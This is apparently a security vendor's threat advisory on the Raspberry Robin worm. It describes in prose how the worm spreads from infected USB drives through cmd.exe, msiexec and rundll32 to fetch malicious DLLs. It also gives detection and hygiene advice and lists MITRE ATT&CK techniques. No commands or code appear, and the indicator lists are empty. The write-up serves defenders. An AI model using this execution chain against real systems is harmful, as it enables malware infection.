Get in Touch
Raspberry Robin worm
No sector has been identified, however targeting is mostly localised to Europe.
Severity level: High – Exploitation may result in command and control (C2) compromise, and loss of sensitive data. Compromise requires physical connection.
A relatively new malware, Russian associated Raspberry Robin was first observed back in September 2021 and has since been used in a growing number of attacks. The worm is spread by either social engineered baiting or via infected external drives, and uses Windows Installer to communicate with compromised QNAP-associated domains to download and install malicious DLL files to the infected device.
The payload behaviour follows five distinct steps:
- Infected external device attached to victim’s computer
- Cmd.exe reads and executes malicious file then launches msiexec.exe that reaches out to malicious URL
- Malicious DLL installed from the previously connected URL
- Rundll32.exe launches legitimate Windows utility to execute malicious DLL
- Outbound connections attempted, usually to TOR networks.
Successful victim exploitation by Raspberry Robin can result in the compromise of the system’s C2 infrastructure. This may lead to further attacks and the loss of sensitive data.
Current builds of Microsoft Defender will alert users to this exploitation by flagging at stage 3 of the attack chain. Logs may also be searched for unexpected msiexec.exe activity and DLL downloads/connections.
Containment, Mitigations & Remediations
Correct cyber hygiene measures are key to countering this threat. Unknown external media devices should never be connected to a system without proper measures in place. If you would like to see what is installed on a hardrive safely, it is recommended that this is done within a virtual machine sandbox first, just in case malicious files are present. This will ensure that malware does not infect further.
Additionally, it is strongly recommended that customers have effective antivirus installed so that threats such a s this are detected and stopped before damage can be done.
Indicators of Compromise
Raspberry Robin reported hash values:
Raspberry Robin associated IPs:
Raspberry Robin has been spreading across Europe since its initial discovery at the tail end of 2021. The spread of this malware has been relatively slow, and highly likely due its deployment method and needing a physical connection to function.
Investigation findings suggest that the Russian cyber crime gang known as Evil Corp is highly likely using Raspberry Robin infrastructure to carry out their latest wave of attacks. However, it is unlikely that Raspberry Robin is exclusive to Evil Corp, based on suggestive reporting.
T1036 – Masquerading
T1091 – Replication Through Removable Media
T1059.003 – Command and Scripting Interpreter: Windows Command Shell
T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
T1218.011 – System Binary Proxy Execution: Rundll32
T1218.008 – System Binary Proxy Execution: Odbcconf
T1218.007 – System Binary Proxy Execution: Msiexec
T1218.010 – System Binary Proxy Execution: Regsver32
T1574.002 – Hijack Execution Flow: DLL Side-Loading
T1071.001 – Application Layer Protocol: Web Protocols
T1105 – Ingress Tool Transfer
Red Canary – Raspberry Robin Blog
Cisco Blogs – Raspberry Robin